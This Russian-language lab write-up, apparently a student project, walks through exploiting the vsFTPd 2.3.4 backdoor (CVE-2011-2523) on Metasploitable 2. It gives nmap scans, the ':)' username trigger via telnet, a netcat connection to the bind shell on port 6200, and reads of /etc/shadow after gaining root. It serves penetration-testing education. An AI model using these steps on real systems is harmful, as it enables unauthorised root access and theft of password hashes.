
Проект: эксплуатация бэкдора vsFTPd 2.3.4 (CVE-2011-2523) на Metasploitable 2.
Этот проект демонстрирует рабочий процесс тестирования на проникновение против намеренно уязвимой машины Metasploitable 2. Цель состояла в том, чтобы идентифицировать, эксплуатировать и проанализировать известную уязвимость в FTP-сервисе, в конечном итоге получив доступ уровня root и оценив последствия для безопасности.
192.168.56.0/24)Проверена целевая система и её конфигурация сети:
whoami
hostname
ifconfig

Подтверждена сетевая связность между атакующим и целью:
ping 192.168.56.101

vsFTPd 2.3.4)Выполнено обнаружение хостов:
nmap -sn 192.168.56.0/24
Обнаружены активные хосты в сети.

nmap 192.168.56.101
Обнаружено несколько открытых портов, включая:

nmap -sV 192.168.56.101
Обнаружен запущенный FTP-сервис:
vsFTPd 2.3.4
Полное сканирование сервисов и скриптов включено в вспомогательные файлы: Результаты сканирования Nmap.

FTP-сервис работал на известной уязвимой версии:
vsFTPd 2.3.4
Эта версия vsFTPd распространялась с вредоносным бэкдором, который активируется при использовании имени пользователя, содержащего :), во время аутентификации.
После активации сервис открывает bind shell на порту 6200, предоставляя несанкционированный удалённый доступ.
Запущен бэкдор с помощью Telnet:
telnet 192.168.56.101 21
USER test:)
PASS test

Подключение к бэкдору через Netcat:
nc 192.168.56.101 6200

whoami
root
Доступ root успешно получен

После получения root-доступа выполнена базовая разведка системы:
cat /etc/passwd
cat /etc/shadow
/etc/shadow

Эта лабораторная работа демонстрирует, как один уязвимый сервис может привести к полной компрометации системы. Она подчёркивает важность правильной настройки сервисов, управления обновлениями и минимизации поверхности атаки.
Это был мой первый опыт ручной эксплуатации реального бэкдора. Я узнал, как одна строка вредоносного имени пользователя (:)) может вызвать root-доступ, что подтвердило, почему разведка сервисов и определение версий так важны. Я также стал более уверенно использовать базовые команды пост-эксплуатации в Linux, такие как чтение /etc/shadow и понимание того, как выглядят хешированные учётные данные.
Это была контролируемая лабораторная среда с использованием Metasploitable 2 – намеренно уязвимой машины. Бэкдор vsFTPd 2.3.4 является известным CVE (CVE-2011-2523) 2011 года, поэтому это не отражает современное реальное тестирование. В реальном задании потребовались бы дополнительные шаги, такие как обход средств защиты, сокрытие логов или перемещение по сети. Этот проект был направлен на понимание основных механизмов эксплуатации, а не на полный тест на проникновение.